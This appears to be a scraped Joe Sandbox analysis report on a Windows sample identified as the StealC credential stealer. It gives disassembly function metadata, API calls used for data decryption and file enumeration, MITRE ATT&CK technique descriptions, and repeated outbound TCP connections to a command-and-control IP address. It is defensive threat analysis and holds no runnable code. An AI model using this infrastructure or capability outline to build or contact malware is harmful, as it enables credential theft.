RCC, xrefs: 00D50512

Memory Dump Source

Source File: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID: Catch
String ID: MOC$RCC
API String ID: 78271584-2084237596
Opcode ID: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
Instruction ID: 472c7b470f6a9710d231e6f1ad5377b720f06c4d0e43031e22e3a46ca003a4cf
Opcode Fuzzy Hash: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
Instruction Fuzzy Hash: 11414871900209AFDF16DF98DC81AEEBBB5FF48305F188199FE04A6261E3359A54DF60

Function 00CE5190 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00CE8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00CE8F9B

lstrcat.KERNEL32(?,00000000), ref: 00CE51CA
lstrcat.KERNEL32(?,00CF1058), ref: 00CE51E7
lstrcat.KERNEL32(?,01598960), ref: 00CE51FB
lstrcat.KERNEL32(?,00CF105C), ref: 00CE520D

Part of subcall function 00CE4B60: wsprintfA.USER32 ref: 00CE4B7C
Part of subcall function 00CE4B60: FindFirstFileA.KERNEL32(?,?), ref: 00CE4B93

Part of subcall function 00CE4B60: StrCmpCA.SHLWAPI(?,00CF0FC4), ref: 00CE4BC1
Part of subcall function 00CE4B60: StrCmpCA.SHLWAPI(?,00CF0FC8), ref: 00CE4BD7
Part of subcall function 00CE4B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00CE4DCD
Part of subcall function 00CE4B60: FindClose.KERNEL32(000000FF), ref: 00CE4DE2

Memory Dump Source

Source File: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
String ID:
API String ID: 2667927680-0
Opcode ID: 4fb6be0a2dfe43925ef8771bdd0d754760db44ee64ca895472d8034e99601362
Instruction ID: 99ddfa73a30623c9d19be433e74903de43b9c2f2ed413776f0ea6941adc0b203
Opcode Fuzzy Hash: 4fb6be0a2dfe43925ef8771bdd0d754760db44ee64ca895472d8034e99601362
Instruction Fuzzy Hash: C821FCF690020CABCB54FBB0EC42EED333C9B55700F004594B65996191FE749ACC9FA1

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CE9030 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,	0_2_00CE9030
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CD72A0 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,	0_2_00CD72A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CDA2B0 CryptUnprotectData,LocalAlloc,LocalFree,	0_2_00CDA2B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CDA210 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	0_2_00CDA210
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CDC920 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,	0_2_00CDC920

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Imports

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

Windows Analysis Report
file.exe

Function 00CE9BB0 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212
libraryloaderCOMMON

Function 00CD4610 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148
memoryCOMMON

Function 00CD62D0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191
networkfileCOMMON

Function 00CE7690 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106
memoryCOMMON

Function 00CE9F20 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684
libraryloaderCOMMON

Function 00CD48D0 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479
networkstringfileCOMMON

Function 00CE5760 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383
sleepCOMMON

Function 00CE19F0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162
COMMON

Function 00CE6C90 Relevance: 9.1, APIs: 6, Instructions: 89
sleepCOMMON

Function 00CD1220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41
COMMON

Function 00CE6D93 Relevance: 6.0, APIs: 4, Instructions: 30
sleepCOMMON

Function 00CD4800 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63
stringnetworkCOMMON

Function 00CE5440 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50
COMMON